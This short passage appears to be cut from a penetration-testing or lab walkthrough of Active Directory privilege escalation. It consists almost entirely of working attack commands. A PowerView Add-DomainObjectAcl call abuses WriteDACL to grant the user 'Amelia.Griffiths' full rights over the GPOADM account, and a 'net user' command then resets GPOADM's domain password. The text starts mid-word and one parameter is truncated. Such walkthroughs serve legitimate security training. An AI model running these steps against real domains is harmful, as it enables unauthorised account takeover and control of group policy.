
his account is a member of legacy group, meaning that we can abuse WriteDACL on gpoadm, with PowerView granting GenericAll on GPOADM
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -Verbos

Now we can change the password for gpoadm
net user GPOADM library /domain

